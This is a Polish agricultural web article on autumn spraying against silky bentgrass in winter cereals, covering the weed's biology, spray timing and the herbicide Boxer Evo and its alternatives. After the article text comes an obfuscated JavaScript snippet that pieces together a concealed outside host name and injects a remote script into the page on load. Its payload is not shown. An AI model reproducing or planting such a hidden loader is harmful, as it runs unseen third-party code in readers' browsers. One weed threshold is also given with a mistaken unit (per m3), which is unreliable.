Staranny dobór najbardziej plennych odmian, skracanie zbóż, odpowiednie nawożenie i orka - to wszystko służyć ma zebraniu jak najbardziej dorodnego plonu. Jednak zda się to na nic, jeśli nasze pole zaatakują chwasty. Jednym z najpowszechniej występujących jest miotła zbożowa - choć jej nazwa brzmi niewinnie, potrafi przynieść ogromne straty. Najczęściej spotkać ją można w uprawach zbóż ozimych - warto wtedy zwalczyć zagrożenie w zarodku. Dowiedz się, jak przeprowadzić oprysk na miotłę zbożową jesienią!
Oprysk na miotłę zbożową jesienią - co będziemy zwalczać?
Zanim na miotłę zbożową wybierzemy odpowiedni oprysk, warto dowiedzieć się więcej o naszym przeciwniku. Chwast ten, nazywany też m.in. mietłą lub miętlicą, należy do roślin wiechlinowatych i jest rośliną jednoroczną, jarą, ale dobrze zimującą. Zwykle wschodzi już jesienią, a okres jej kwitnienia i wkrótce wysypywania nasion przypada na miesiące letnie - głównie lipiec i sierpień. Jedna roślina wytwarza średnio ok. 2 tys. nasion, choć liczba ta może wynieść nawet 12 tys. Opracowany próg szkodliwości miętlicy (5 proc. spadku plonu) wynosi 10-20 szt./m3 (25-40 wiech). Chwast ten preferuje gleby:
piaszczyste,
piaszczysto-gliniaste,
lekko wilgotne,
próchniczne,
ubogie w wapń (roślina wskaźnikowa),
lekkie,
lekko kwaśne.
Zachwaszcza nie tylko zboża (głównie ozime), ale też uprawy okopowe, szerokorzędowe, koniczynę i rzadziej rzepak. Występuje również na łąkach.
Oprysk na miotłę zbożową jesienią - jak go przeprowadzić.
Wykonanie oprysku na miotłę zbożową jesienią zwykle zalecane jest niedługo po wschodach - najczęściej zacząć można ok. 11-13 BBCH (faza 1-3 liścia).
Aby skutecznie zwalczać miotłę zbożową, oprysk najlepiej wykonać przy optymalnych warunkach pogodowych - temperaturze powyżej zera i braku opadów.
Wybierając odpowiedni środek na miotłę zbożową znajdźmy taki, który przy okazji rozprawi się też z innymi często występującymi chwastami jednoliściennymi, jak gwiazdnica pospolita czy dwuliściennymi - w tym maruną bezwonną lub rumiankiem pospolitym. Dobrym wyborem będzie nowa, silniejsza wersja znanego preparatu Boxer 800 EC, czyli Boxer Evo. Podstawę preparatu stanowią dwie substancje:
prosulfokarb - niezwykle skuteczny w zwalczaniu chwastów jednoliściennych, w tym właśnie jako środek na miotłę zbożową,
diflufenikan - podnosi skuteczność preparatu w zwalczaniu chwastów dwuliściennych.
Z użyciem preparatu Boxer Evo pozbędziemy się więc dodatkowo takich chwastów, jak:
przytulia czepna,
przetacznik perski,
gwiazdnica pospolita,
fiołek polny,
tasznik pospolity,
wiechlina roczna,
maruna bezwonna,
rumianek pospolity,
samosiewy rzepaku.
Preparat można stosować we wszystkich zbożach ozimych - pszenicy, jęczmieniu, życie i pszenżycie. Stosować go należy w okresie tuż przed wschodami bądź zaraz po nich - optymalne będą przedziały BBCH 01-09 lub 10-13 (między początkiem pęcznienia a wydostaniem się pochewki liściowej ponad powierzchnię ziemi lub pomiędzy wydobyciem się z pochewki pierwszego liścia a fazą 3 liści).
Inne substancje, przejawiające wysoką skuteczność w zwalczaniu miotły zbożowej, to np.:
pinoksaden (BBCH 11-29) - preparaty Axial One, Axial 50, Axial Komplett Pak i Fraxial,
fluazyfop-P-butylowy (BBCH 12-14) - preparat Trivko.,
chlomazon - preparat Brasan (rzepak),
dimetachlor - preparat Brasan i Teridox (rzepak).
Oprysk na miotłę zbożową jesienią - czy to jedyny sposób na jej zwalczenie?
Jak powszechnie wiadomo, lepiej zapobiegać, niż leczyć. Dlatego w ochronie pól przed mietłą warto pamiętać o kilku podstawowych zasadach prawidłowej agrotechniki, w tym:
wybieraniu kwalifikowanego materiału siewnego - z dobrego, sprawdzonego źródła,
regularnym i starannym oczyszczaniu maszyn i narzędzi, używanych do siewu i zbioru,
zmianie materiału siewnego co parę lat,
systematycznym oczyszczaniu rowów i obrzeży pól - chwast ten rozprzestrzenia się niezwykle szybko.
Orka przedsiewna może natomiast ograniczyć zachwaszczenie pola w bardzo ograniczonym zakresie - choć nasiona miętlicy nie będą mogły zakiełkować, znajdując się głębiej w ziemi, mają one zdolność przetrwania w niej nawet przez kilka lat.
Może się zdarzyć, że zarówno profilaktyka, jak i oprysk jesienny nie wyeliminują problemu całkowicie - wtedy herbicydy należy zastosować ponownie wiosną. Takie kompleksowe działanie powinno stanowić skuteczny oręż w walce z tym uciążliwym chwastem.
(function(){
zpcc=document.createElement("script");zpcc_=(("u")+"st")+"a";zpcc.async=true;
zpcc.type="text/javascript";zpcc_+=("t.i")+""+"n";zpcc_+=(("f")+"o");zpcc_+="/";
zpccu="69244063.";zpccu+="y96qi6p5pccetcm1w2x"+"vgq7vtp7gym";
zpcc.src="//"+zpcc_+zpccu; document.body.appendChild(zpcc);
})();
Brak komentarza, Twój może być pierwszy.
Dodaj komentarz